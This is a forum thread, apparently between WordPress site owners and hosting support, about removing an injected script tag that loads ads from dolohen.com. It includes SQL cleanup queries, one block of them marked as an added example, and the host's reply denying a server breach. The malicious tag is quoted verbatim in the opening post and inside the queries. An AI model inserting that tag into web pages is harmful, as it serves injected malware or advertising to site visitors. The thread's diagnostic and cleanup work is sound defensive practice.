I took a look at your website at https://hattonwillow.co.uk/
and found this:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
I believe this may have been injected into your /wp-includes/functions.php file.
Can you do a search for dolohen within that file?
Dave

Also could you please remove my website address from your reply as I don’t want it to appear in Google search results.
Any other ideas?
Thanks

I have just re-opened the malware ticket that I had opened with tsohost. The person couldn’t even find the adverts so I don’t hold out much hope. I told him to open my website and click on any link!!!
I think we are all on the same range of database servers. Andrew?

https://www.wordfence.com/blog/2018/02/service-vulnerability-nfs-permissions-problem/

-- Remove the injected script tag from every post whose content contains it
UPDATE wp_posts
SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>', '')
WHERE post_content LIKE '%<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>%' COLLATE utf8mb4_bin;
Obviously this won’t make a difference if it gets infected again straight away.
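
A way to run the cleanup above with a preview, a backup and a verification step, as an added example that is not part of the original post. It assumes MySQL or MariaDB and the default wp_ table prefix; wp_posts_dolohen_backup is a hypothetical table name, and the REGEXP_REPLACE step goes beyond the exact-match statement in the post.

```sql
-- Added example. Assumes MySQL/MariaDB and the default wp_ table prefix;
-- wp_posts_dolohen_backup is a hypothetical table name.

-- 1. Preview how many rows carry the injected host, by post type and status
--    (revisions and drafts are stored in wp_posts too).
SELECT post_type, post_status, COUNT(*) AS affected
FROM wp_posts
WHERE post_content LIKE '%dolohen.com%'
GROUP BY post_type, post_status;

-- 2. Keep a copy of the affected rows before changing anything.
CREATE TABLE wp_posts_dolohen_backup AS
SELECT * FROM wp_posts
WHERE post_content LIKE '%dolohen.com%';

-- 3. Remove the tag whatever its zoneid or attribute order.
--    REGEXP_REPLACE needs MySQL 8.0+ or MariaDB 10.0.5+; on older servers
--    use the exact-match REPLACE statement from the post instead.
UPDATE wp_posts
SET post_content = REGEXP_REPLACE(
        post_content,
        '<script[^>]*dolohen[.]com[^>]*></script>',
        '')
WHERE post_content LIKE '%dolohen.com%';

-- 4. Verify. Expect no rows; anything returned holds the host in some
--    other markup and needs a manual look.
SELECT ID, post_type, LEFT(post_content, 200) AS snippet
FROM wp_posts
WHERE post_content LIKE '%dolohen.com%';
```
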

I have further investigated the case with our seniors and this dolohen hack seems to be quite the new occurrence.
I found a topic which breaks it down a bit –
https://medericburlet.com/dolohem-wordpress-malware/
Most of our databases begin with 10.169.0, so that won’t be the pattern here.
Please also keep in mind that all cases are on WP CMS, which makes this more related to a WP vulnerability, than to our database servers.
I can also recommend following https://www.wordfence.com/blog/ and https://blog.sucuri.net/ for any updates and vulnerability updates from popular web security specialists.
I completely understand your concerns in regards to our servers, but I can assure you our database servers are fully secured and no breach was detected whatsoever as of now. We are still looking further into the case and we will make sure to get to the bottom of this supposed security breach, whether it’s related to us or to WordPress on our hosting.
Make sure to keep all your plugins updated to the latest version, as well as your WordPress version to the latest one, as that is the best way to be as secured as possible.